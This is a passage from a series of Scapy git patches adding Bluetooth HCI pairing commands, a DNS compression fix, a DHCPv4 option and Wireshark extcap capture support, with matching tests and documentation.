"NoInputNoOutput", }), + ByteEnumField("oob_data_present", None, {0x00: "Not Present", + 0x01: "P-192", + 0x02: "P-256", + 0x03: "P-192 + P-256", }), + ByteEnumField("authentication_requirement", None, + {0x00: "MITM Not Required", + 0x01: "MITM Required, No Bonding", + 0x02: "MITM Not Required + Dedicated Pairing", + 0x03: "MITM Required + Dedicated Pairing", + 0x04: "MITM Not Required, General Bonding", + 0x05: "MITM Required + General Bonding"}), ] + + +class HCI_Cmd_User_Confirmation_Request_Reply(Packet): + """ + + 7.1.30 User Confirmation Request Reply command + + """ + + name = "HCI_User_Confirmation_Request_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_User_Confirmation_Request_Negative_Reply(Packet): + """ + + 7.1.31 User Confirmation Request Negative Reply command + + """ + + name = "HCI_User_Confirmation_Request_Negative_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_User_Passkey_Request_Reply(Packet): + """ + + 7.1.32 User Passkey Request Reply command + + """ + + name = "HCI_User_Passkey_Request_Reply" + fields_desc = [LEMACField("bd_addr", None), + LEIntField("numeric_value", None), ] + + +class HCI_Cmd_User_Passkey_Request_Negative_Reply(Packet): + """ + + 7.1.33 User Passkey Request Negative Reply command + + """ + + name = "HCI_User_Passkey_Request_Negative_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + + +class HCI_Cmd_Remote_OOB_Data_Request_Reply(Packet): + """ + + 7.1.34 Remote OOB Data Request Reply command + + """ + + name = "HCI_Remote_OOB_Data_Request_Reply" + fields_desc = [LEMACField("bd_addr", None), + NBytesField("C", b"\x00" * 16, sz=16), + NBytesField("R", b"\x00" * 16, sz=16), ] + + +class HCI_Cmd_Remote_OOB_Data_Request_Negative_Reply(Packet): + """ + + 7.1.35 Remote OOB Data Request Negative Reply command + + """ + + name = "HCI_Remote_OOB_Data_Request_Negative_Reply" + fields_desc = [LEMACField("bd_addr", None), ] + # 7.2 Link Policy commands, the OGF is defined as 0x02 + + class HCI_Cmd_Hold_Mode(Packet): name = "HCI_Hold_Mode" fields_desc = [LEShortField("connection_handle", 0), @@ -1223,11 +1518,29 @@ def answers(self, other): return self.payload.answers(other) -class HCI_Event_Connect_Complete(Packet): - name = "Connect Complete" +class HCI_Event_Inquiry_Complete(Packet): + """ + 7.7.1 Inquiry Complete event + """ + + name = "HCI_Inquiry_Complete" + fields_desc = [ByteField("status", 0), ] + + +class HCI_Event_Connection_Complete(Packet): + """ + 7.7.3 Connection Complete event + """ + + name = "HCI_Connection_Complete" fields_desc = [ByteField("status", 0), LEShortField("handle", 0x0100), - LEMACField("bd_addr", None), ] + LEMACField("bd_addr", None), + ByteEnumField("link_type", 0, {0: "SCO connection", + 1: "ACL connection", }), + ByteEnumField("encryption_enaled", 0, + {0: "link level encryption disabled", + 1: "link level encryption enabled", }), ] class HCI_Event_Disconnection_Complete(Packet): @@ -1387,10 +1700,36 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_Exit_Peiodic_Inquiry_Mode, ogf=0x01, ocf=0x0004) bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, ogf=0x01, ocf=0x0005) bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, ogf=0x01, ocf=0x0006) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection_Cancel, ogf=0x01, ocf=0x0008) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Accept_Connection_Request, ogf=0x01, ocf=0x0009) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Reject_Connection_Response, ogf=0x01, ocf=0x000a) bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, ogf=0x01, ocf=0x000b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Negative_Reply, + ogf=0x01, ocf=0x000c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_PIN_Code_Request_Reply, ogf=0x01, ocf=0x000d) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Change_Connection_Packet_Type, + ogf=0x01, ocf=0x000f) bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, ogf=0x01, ocf=0x0011) bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, ogf=0x01, ocf=0x0013) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Change_Connection_Link_Key, ogf=0x01, ocf=0x0017) bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, ogf=0x01, ocf=0x0019) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request_Cancel, ogf=0x01, ocf=0x001a) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Remote_Supported_Features, + ogf=0x01, ocf=0x001b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Remote_Supported_Features, + ogf=0x01, ocf=0x001c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_IO_Capability_Request_Reply, ogf=0x01, ocf=0x002b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_User_Confirmation_Request_Reply, + ogf=0x01, ocf=0x002c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_User_Confirmation_Request_Negative_Reply, + ogf=0x01, ocf=0x002d) +bind_layers(HCI_Command_Hdr, HCI_Cmd_User_Passkey_Request_Reply, ogf=0x01, ocf=0x002e) +bind_layers(HCI_Command_Hdr, HCI_Cmd_User_Passkey_Request_Negative_Reply, + ogf=0x01, ocf=0x002f) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_OOB_Data_Request_Reply, + ogf=0x01, ocf=0x0030) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_OOB_Data_Request_Negative_Reply, + ogf=0x01, ocf=0x0033) # 7.2 Link Policy commands, the OGF is defined as 0x02 bind_layers(HCI_Command_Hdr, HCI_Cmd_Hold_Mode, ogf=0x02, ocf=0x0001) @@ -1442,7 +1781,9 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply, ogf=0x08, ocf=0x001b) # noqa: E501 # 7.7 EVENTS -bind_layers(HCI_Event_Hdr, HCI_Event_Connect_Complete, code=0x03) +bind_layers(HCI_Event_Hdr, HCI_Event_Inquiry_Complete, code=0x01) + +bind_layers(HCI_Event_Hdr, HCI_Event_Connection_Complete, code=0x03) bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x05) bind_layers(HCI_Event_Hdr, HCI_Event_Remote_Name_Request_Complete, code=0x07) bind_layers(HCI_Event_Hdr, HCI_Event_Encryption_Change, code=0x08) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 1743e6de91c..539a3d97ffd 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -268,10 +268,10 @@ assert expected_cmd_raw_data == cmd_raw_data evt_raw_data = hex_bytes("04030b00000176d56f9501000100") evt_pkt = HCI_Hdr(evt_raw_data) -assert HCI_Event_Connect_Complete in evt_pkt -assert evt_pkt[HCI_Event_Connect_Complete].status == 0 -assert evt_pkt[HCI_Event_Connect_Complete].handle == 256 -assert evt_pkt[HCI_Event_Connect_Complete].bd_addr == "00:01:95:6f:d5:76" +assert HCI_Event_Connection_Complete in evt_pkt +assert evt_pkt[HCI_Event_Connection_Complete].status == 0 +assert evt_pkt[HCI_Event_Connection_Complete].handle == 256 +assert evt_pkt[HCI_Event_Connection_Complete].bd_addr == "00:01:95:6f:d5:76" = Remote Name Request Complete From e9462cb028bc0e2305a21429ad8817f119d2767b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 2 Sep 2023 09:01:23 +0200 Subject: [PATCH 1082/1632] Do not compress 1 octet DNS strings (#4110) --- scapy/layers/dns.py | 2 ++ test/scapy/layers/dns.uts | 10 +++++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 893e58ac8ca..4191a7cf665 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -215,6 +215,8 @@ def field_gen(dns_pkt): def possible_shortens(dat): """Iterates through all possible compression parts in a DNS string""" + if dat == b".": # we'd lose by compressing it + return yield dat for x in range(1, dat.count(b".")): yield dat.split(b".", x)[x] diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index a6644cd149e..a27bec3d91b 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -259,6 +259,14 @@ assert p.qd[0].qname == b'scapy.' assert p.an[0].rrname == b'scapy.' assert p.ar[0].rrname == b'.' += DNS - dns_compress with 1-length strings + +data = b'\xac\x81\x81\x80\x00\x01\x00\x06\x00\r\x00\x00\x04mqtt\x0bweatherflow\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x05\x00\x01\x00\x00\x00\xe4\x00 Date: Sat, 2 Sep 2023 12:20:37 +0300 Subject: [PATCH 1083/1632] [DHCPv4] add the IPv6-Only Preferred Option (#4108) --- scapy/layers/dhcp.py | 1 + test/scapy/layers/dhcp.uts | 5 +++-- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 0e1aef72679..ce493813367 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -318,6 +318,7 @@ def randval(self): 98: StrField("uap-servers", ""), 100: StrField("pcode", ""), 101: StrField("tcode", ""), + 108: IntField("ipv6-only-preferred", 0), 112: IPField("netinfo-server-address", "0.0.0.0"), 113: StrField("netinfo-server-tag", ""), 114: StrField("captive-portal", ""), diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 8abac11f540..3010d3e0933 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -44,8 +44,8 @@ s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(option ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' -s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), "end"])) -assert s4 == b"E\x00\x017\x00\x01\x00\x00@\x11{\xb3\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01#\xb8\xe7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\xff" +s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), ("ipv6-only-preferred", 0xffffffff), "end"])) +assert s4 == b"E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)L\xd7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\x6c\x04\xff\xff\xff\xff\xff" s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), "end"])) assert s5 == b'E\x00\x01 \x00\x01\x00\x00@\x11{\xca\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0c\xabQ\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02\xff' @@ -81,6 +81,7 @@ p4 = IP(s4) assert DHCP in p4 assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") assert p4[DHCP].options[1] == ("captive-portal", b"https://example.com") +assert p4[DHCP].options[2] == ("ipv6-only-preferred", 0xffffffff) p5 = IP(s5) assert DHCP in p5 From f0843cc7ad2d0e6e2a96fdd84fe14a1d5e8d4a8c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 3 Sep 2023 10:33:13 +0200 Subject: [PATCH 1084/1632] Add wireshark extcap support (#4101) --- .config/mypy/mypy_enabled.txt | 3 + doc/scapy/layers/bluetooth.rst | 23 +++ doc/scapy/routing.rst | 87 ++++++++--- scapy/arch/__init__.py | 3 + scapy/arch/bpf/core.py | 9 +- scapy/arch/linux.py | 9 +- scapy/arch/windows/__init__.py | 11 +- scapy/arch/windows/structures.py | 62 ++++++++ scapy/config.py | 24 ++- scapy/contrib/nrf_sniffer.py | 154 +++++++++++++++++++ scapy/data.py | 1 + scapy/interfaces.py | 32 ++-- scapy/layers/bluetooth4LE.py | 7 +- scapy/layers/usb.py | 145 +----------------- scapy/libs/extcap.py | 254 +++++++++++++++++++++++++++++++ scapy/route.py | 4 +- scapy/utils.py | 32 +++- test/regression.uts | 89 +++++++++++ test/scapy/layers/usb.uts | 52 ------- 19 files changed, 742 insertions(+), 259 deletions(-) create mode 100644 scapy/contrib/nrf_sniffer.py create mode 100644 scapy/libs/extcap.py diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 42f1c6db7b8..6238db12561 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -86,6 +86,9 @@ scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py scapy/contrib/tcpao.py +# LIBS +scapy/libs/extcap.py + # TEST test/testsocket.py diff --git a/doc/scapy/layers/bluetooth.rst b/doc/scapy/layers/bluetooth.rst index c9c4a535e1c..d1d9add131b 100644 --- a/doc/scapy/layers/bluetooth.rst +++ b/doc/scapy/layers/bluetooth.rst @@ -654,3 +654,26 @@ Results in the output: | | len= 5 | |###[ Raw ]### | | load= '\x03\x18\xc0\xb5%' + + +Using Nordic Semiconductor's nRF Sniffer +======================================== + +Since **Scapy >2.5.0**, Scapy supports `Wireshark's extcap `_ interfaces. +You can therefore use your USB nordic bluetooth dongle, provided that you `have installed `_ the Wireshark module properly. + +.. code:: pycon + + >>> load_contrib("nrf_sniffer") + >>> load_extcap() + >>> conf.ifaces + Source Index Name Address + nrf_sniffer_ble 100 nRF Sniffer for Bluetooth LE /dev/ttyUSB0-None + [...] + >>> sniff(iface="/dev/ttyUSB0-None", prn=lambda x: x.summary()) + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_IND + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_IND + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_IND + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_NONCONN_IND + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_NONCONN_IND + NRFS2_PCAP / NRFS2_Packet / NRF2_Packet_Event / BTLE / BTLE_ADV / BTLE_ADV_IND diff --git a/doc/scapy/routing.rst b/doc/scapy/routing.rst index a426d9fd93d..eec9dffbca1 100644 --- a/doc/scapy/routing.rst +++ b/doc/scapy/routing.rst @@ -1,36 +1,79 @@ -************* -Scapy routing -************* +******************* +Scapy network stack +******************* -Scapy needs to know many things related to the network configuration of your machine, to be able to route packets properly. For instance, the interface list, the IPv4 and IPv6 routes... +Scapy maintains its own network stack, which is independent from the one of your operating system. +It possesses its own *interfaces list*, *routing table*, *ARP cache*, *IPv6 neighbour* cache, *nameservers* config... and so on, all of which is configurable. -This means that Scapy has implemented bindings to get this information. Those bindings are OS specific. This will show you how to use it for a different usage. +Here are a few examples of where this is used:: +- When you use ``sr()/send()``, Scapy will use internally its own routing table (``conf.route``) in order to find which interface to use, and eventually send an ARP request. +- When using ``dns_resolve()``, Scapy uses its own nameservers list (``conf.nameservers``) to perform the request +- etc. .. note:: - Scapy will have OS-specific functions underlying some high level functions. This page ONLY presents the cross platform ones + What's important to note is that Scapy initializes its own tables by querying the OS-specific ones. + It has therefore implemented bindings for Linux/Windows/BSD.. in order to retrieve such data, which may also be used as a high-level API, documented below. -List interfaces +Interfaces list --------------- -Use ``get_if_list()`` to get the interface list +Scapy stores its interfaces list in the :py:attr:`conf.ifaces ` object. +It provides a few utility functions such as :py:attr:`dev_from_networkname() `, :py:attr:`dev_from_name() ` or :py:attr:`dev_from_index() ` in order to access those. + +.. code-block:: pycon + + >>> conf.ifaces + Source Index Name MAC IPv4 IPv6 + sys 1 lo 00:00:00:00:00:00 127.0.0.1 ::1 + sys 2 eth0 Microsof:12:cb:ef 10.0.0.5 fe80::10a:2bef:dc12:afae + >>> conf.ifaces.dev_from_index(2) + + +You can also use the older ``get_if_list()`` function in order to only get the interface names. .. code-block:: pycon >>> get_if_list() ['lo', 'eth0'] -You can also use the :py:attr:`conf.ifaces ` object to get interfaces. -In this example, the object is first displayed as as column. Then, the :py:attr:`dev_from_index() ` is used to access the interface at index 2. +Extcap interfaces +~~~~~~~~~~~~~~~~~ + +Scapy supports sniffing on `Wireshark's extcap `_ interfaces. You can simply enable it using ``load_extcap()`` (from ``scapy.libs.extcap``). .. code-block:: pycon + >>> load_extcap() >>> conf.ifaces - SRC INDEX IFACE IPv4 IPv6 MAC - sys 2 eth0 10.0.0.5 fe80::10a:2bef:dc12:afae Microsof:12:cb:ef - sys 1 lo 127.0.0.1 ::1 00:00:00:00:00:00 - >>> conf.ifaces.dev_from_index(2) - + Source Index Name Address + ciscodump 100 Cisco remote capture ciscodump + dpauxmon 100 DisplayPort AUX channel monitor capture dpauxmon + randpktdump 100 Random packet generator randpkt + sdjournal 100 systemd Journal Export sdjournal + sshdump 100 SSH remote capture sshdump + udpdump 100 UDP Listener remote capture udpdump + wifidump 100 Wi-Fi remote capture wifidump + Source Index Name MAC IPv4 IPv6 + sys 1 lo 00:00:00:00:00:00 127.0.0.1 ::1 + sys 2 eth0 Microsof:12:cb:ef 10.0.0.5 fe80::10a:2bef:dc12:afae + + +Here's an example of how to use `sshdump `_. As you can see you can pass arguments that are properly converted: + +.. code-block:: pycon + + >>> load_extcap() + >>> sniff( + ... iface="sshdump", + ... prn=lambda x: x.summary(), + ... remote_host="192.168.0.1", + ... remote_username="root", + ... remote_password="SCAPY", + ... ) + + +.. todo:: The sections below can be greatly improved. IPv4 routes ----------- @@ -63,8 +106,8 @@ IPv6 routes Same than IPv4 but with :py:attr:`conf.route6 ` -Get router IP address ---------------------- +Get default gateway IP address +------------------------------ .. code-block:: pycon @@ -72,8 +115,8 @@ Get router IP address >>> gw '10.0.0.1' -Get local IP / IP of an interface ---------------------------------- +Get the IP of an interface +-------------------------- Use ``conf.iface`` @@ -84,8 +127,8 @@ Use ``conf.iface`` >>> ip '10.0.0.5' -Get local MAC / MAC of an interface ------------------------------------ +Get the MAC of an interface +--------------------------- .. code-block:: pycon @@ -97,6 +140,8 @@ Get local MAC / MAC of an interface Get MAC by IP ------------- +This basically performs a cached ARP who-has. + .. code-block:: pycon >>> mac = getmacbyip("10.0.0.1") diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 0c1fafac153..806e137029c 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -24,6 +24,8 @@ from scapy.interfaces import NetworkInterface, network_name from scapy.pton_ntop import inet_pton, inet_ntop +from scapy.libs.extcap import load_extcap + # Typing imports from typing import ( Optional, @@ -47,6 +49,7 @@ "read_nameservers", "read_routes", "read_routes6", + "load_extcap", "SIOCGIFHWADDR", ] diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index b3439892461..76eb7796cef 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -27,8 +27,11 @@ from scapy.consts import LINUX from scapy.data import ARPHDR_LOOPBACK, ARPHDR_ETHER from scapy.error import Scapy_Exception, warning -from scapy.interfaces import InterfaceProvider, IFACES, NetworkInterface, \ - network_name +from scapy.interfaces import ( + InterfaceProvider, + NetworkInterface, + network_name, +) from scapy.pton_ntop import inet_ntop if LINUX: @@ -250,4 +253,4 @@ def load(self): return data -IFACES.register_provider(BPFInterfaceProvider) +conf.ifaces.register_provider(BPFInterfaceProvider) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index d4de5d6995e..d597ca4457a 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -40,8 +40,11 @@ log_runtime, warning, ) -from scapy.interfaces import IFACES, InterfaceProvider, NetworkInterface, \ - network_name +from scapy.interfaces import ( + InterfaceProvider, + NetworkInterface, + network_name, +) from scapy.libs.structures import sock_fprog from scapy.packet import Packet, Padding from scapy.pton_ntop import inet_ntop @@ -449,7 +452,7 @@ def load(self): return data -IFACES.register_provider(LinuxInterfaceProvider) +conf.ifaces.register_provider(LinuxInterfaceProvider) if os.uname()[4] in ['x86_64', 'aarch64']: def get_last_packet_timestamp(sock): diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index e8b59f3a1df..198fcee257f 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -189,18 +189,15 @@ def _reload(self): self.hexedit = win_find_exe("hexer") self.sox = win_find_exe("sox") self.wireshark = win_find_exe("wireshark", "wireshark") - self.usbpcapcmd = win_find_exe( - "USBPcapCMD", - installsubdir="USBPcap", - env="programfiles" - ) + self.extcap_folders = [ + os.path.join(os.environ.get("appdata", ""), "Wireshark", "extcap"), + os.path.join(os.environ.get("programfiles", ""), "Wireshark", "extcap"), + ] self.powershell = win_find_exe( "powershell", installsubdir="System32\\WindowsPowerShell\\v1.0", env="SystemRoot" ) - self.cscript = win_find_exe("cscript", installsubdir="System32", - env="SystemRoot") self.cmd = win_find_exe("cmd", installsubdir="System32", env="SystemRoot") if self.wireshark: diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index 90399d62535..a74cce21118 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -23,13 +23,16 @@ from scapy.config import conf from scapy.consts import WINDOWS_XP +from scapy.data import MTU # Typing imports from typing import ( Any, Dict, + IO, List, Optional, + Tuple, ) ANY_SIZE = 65500 # FIXME quite inefficient :/ @@ -42,6 +45,7 @@ ULONG = ctypes.wintypes.ULONG ULONGLONG = ctypes.c_ulonglong HANDLE = ctypes.wintypes.HANDLE +LPVOID = ctypes.wintypes.LPVOID LPWSTR = ctypes.wintypes.LPWSTR VOID = ctypes.c_void_p INT = ctypes.c_int @@ -607,3 +611,61 @@ def GetIpForwardTable2(AF=AddressFamily.AF_UNSPEC): results.append(_struct_to_dict(table.contents.Table[i])) _FreeMibTable(table) return results + + +############## +#### FIFO #### +############## + +class _SECURITY_ATTRIBUTES(Structure): + _fields_ = [("nLength", DWORD), + ("lpSecurityDescriptor", LPVOID), + ("bInheritHandle", BOOL)] + + +LPSECURITY_ATTRIBUTES = POINTER(_SECURITY_ATTRIBUTES) + + +def _get_win_fifo() -> Tuple[str, Any]: + """Create a windows fifo and returns the (client file, server fd) + """ + from scapy.volatile import RandString + f = r"\\.\pipe\scapy%s" % str(RandString(6)) + buffer = create_string_buffer(ctypes.sizeof(_SECURITY_ATTRIBUTES)) + sec = ctypes.cast(buffer, LPSECURITY_ATTRIBUTES) + sec.contents.nLength = ctypes.sizeof(_SECURITY_ATTRIBUTES) + res = ctypes.windll.kernel32.CreateNamedPipeA( + create_string_buffer(f.encode()), + 0x00000003 | 0x40000000, + 0, + 1, 65536, 65536, + 300, + sec, + ) + if res == -1: + raise OSError(ctypes.FormatError()) + return f, res + + +def _win_fifo_open(fd: Any) -> IO[bytes]: + """Connect NamedPipe and return a fake open() file + """ + ctypes.windll.kernel32.ConnectNamedPipe(fd, None) + + class _opened(IO[bytes]): + def read(self, x: int = MTU) -> bytes: + buf = ctypes.create_string_buffer(x) + res = ctypes.windll.kernel32.ReadFile( + fd, + buf, + x, + None, + None, + ) + if res == 0: + raise 